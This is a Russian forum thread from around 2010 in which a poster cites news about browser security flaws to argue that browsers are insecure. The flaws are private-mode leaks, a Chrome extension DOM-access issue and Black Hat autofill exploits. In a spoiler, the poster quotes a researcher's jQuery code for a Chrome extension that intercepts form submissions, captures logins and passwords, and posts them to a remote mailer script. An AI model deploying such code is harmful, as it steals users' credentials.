Цитата: Единые стандарты позволяют сохранить работоспособность и одинаковый вид сайта при использовании любого браузера.
именно поэтому некоторые страницы о бете ие9 по-разному выглядели в хроме и ие??
Добавлено: Цитата: В рамках симпозиума Usenix Security Symposium эксперты проверили исследование приватных режимов просмотра в браузерах Internet Explorer, Mozilla Firefox, Google Chrome и Safari. После проведеных тестирований, эксперты пришли к выводу, что с обязанностью сохранять анонимность и не оставлять следов после посещения сайтов в Интернете браузеры не справляются.
Одна из проблем состоит в том, что при сохранении SSL-сертификатов браузеры записывают действия с сертификатом в файл, просмотреть который может любой человек с физическим доступом к компьютеру. Например, в Mozilla Firefox - это файл cert8.db, в который записывается часть истории посещения ресурсов с SSL-сертами.
Также при просмотре страниц в защищенном режиме Firefox, данные компрометируются в случае использования уникальных для каждого сайта настроек, либо при использовании одобренных Mozilla плагинов. Плюс к этому, запоминается история с сайтов, использующих специфические команды управления, основанные на стандарте HTML5.
Режим InPrivate в браузере Internet Explorer, в свою очередь, разглашает данные, когда веб-сайты осуществляют запросы SMB. Это происходит из-за того, что веб-обозреватель от Microsoft делит значительную часть кода с файловым менеджером Windows Explorer.
Добавлено: Цитата: Специалист по компьютерной безопасности Андреас Грэх обратил внимание на очередную брешь безопасности в веб-браузере Google Chrome. Уязвимость была обнаружена в новой функции Google Chrome, позволяющей сторонним разработчикам создавать расширения на JavaScript и HTML с возможностью доступа к объектам DOM. Доступ к объектной модели документа позволяет плагину получить значения каких-либо полей форм на любом из открытых веб-сайтов, не исключением являются поля ввода логина и пароля.
В рамках своей публикации, Андреас Грэх подробно рассматривает пример реализации простейшего расширения для Google Chrome, позволяющего реализовать описанный функционал. Для создания экспериментального плагина использовалась технология AJAX и библиотека jQuery. Созданное в итоге расширение отлично справлялось с перехватом логина и пароля доступа на Gmail, Facebook, Twitter и других популярных веб-ресурсах.
Таким образом, у любого расширения, установленного в Google Chrome появляется возможность шпионить за вводимыми логинами и паролями. Единственным способом обеспечения собственной безопасности является отказ от использования расширений сомнительных разработчиков, но никто не мешает разработчикам использовать эту уязвимость и в популярных расширениях для веб-браузера Google Chrome.
[more=пример експлоита]For this extension, I am making use of jQuery as to write quick code for this prototype, but it can obviously be rewritten without it's dependency.
The first thing the script does is attach a submit handler to every form field on the page:
$("form").submit(function(e) {
var $this = $(this);
e.preventDefault();
process(function() {
$this.unbind('submit');
$this.submit();
});
});
We hook to the submit handler to prevent the default behaviour of the form (ie submitting normally) with e.preventDefault and to call our process function:
var process = function(callback) {
var username = $("input[type=text]").not(passwordBoxes).filter(function() {
var field = $(this);
return field.val() || field.html();
}).val(),
password = passwordBoxes.val();
sendEmail(username, password, location.href, callback);
};
The process function captures the values of the username and password fields respectively. passwordBoxes is a variable containing the inputs of the page that have their type set as password:
var passwordBoxes = $("input[type=password]");
Upon capturing the values of the username and password fields, these are sent along with the current url and the callback that submits the form to the sendEmail function which sends the email with the username, password and url via an Ajax call:
var sendEmail = function(username, password, url, callback) {
var msg = getMessage(username, password, url);
$.ajax({
type: 'POST',
url: 'the url of the mailer script',
data: 'the headers you want to send',
success: callback
});
};
The getMessage function simply returns a formatted string with the details that will be contained in the email:
var getMessage = function(username, password, url) {
return "Username: " + username + " || Password: " + password + " || Url: " + url;
};
After the details are sent, the callback is invoked which submits the form normally.
Note that there could be a very small delay between the user clicking the submit button and the form being submitted because of the Ajax call, but it is barely noticeable.[/more]
Добавлено: Цитата: Все современные веб-браузеры уязвимы. Об этом заявили участники хакерской конференции в США Black Hat 2010. По данным экспертов, при помощи существующих эксплоитов потенциальные злоумышленники могут получать доступ к банковским счетам пользователей, информации в закрытой части социальных сетей и использовать их в других незаконных сферах.
"Ни один из существующих браузеров не устоял перед представленными на Black Hat эксплоитами. Все представленные эксплоиты применять совсем несложно", - говорит Джеремайя Гроссман, тенхнический директор WhiteHa Security.
По его словам, существующие эксплоиты могут получать из браузеров хранимую информацию массой способов и из самых разных источников, например из системы автозаполнения, присутствующей во всех современных браузерах. В данной системе содержатся данные об имени пользователя, его электронной почте, данных о кредитных картах и другой информации.
По словам Гроссмана, безопасность современных браузеров - это основная тема BlackHat 2010. Наиболее остро стоит сейчас проблема обеспечения безопасности пользовательских данных, с которыми работают браузеры, обеспечение приватности пользователей в интернете.
На конференции различными группами ИТ-специалистов были представлены несколько эксплоитов, атакующих функцию автозаполнения в современных браузерах Internet Explorer. Safari, Chrome и Firefox.
Добавлено: Цитата: Это ложная информация
блажен кто верует.
а пример рабочего експлоита тоже ложь ))))
все, т.к. на все доводы ответ один, то думаю продолжать смысла нет.
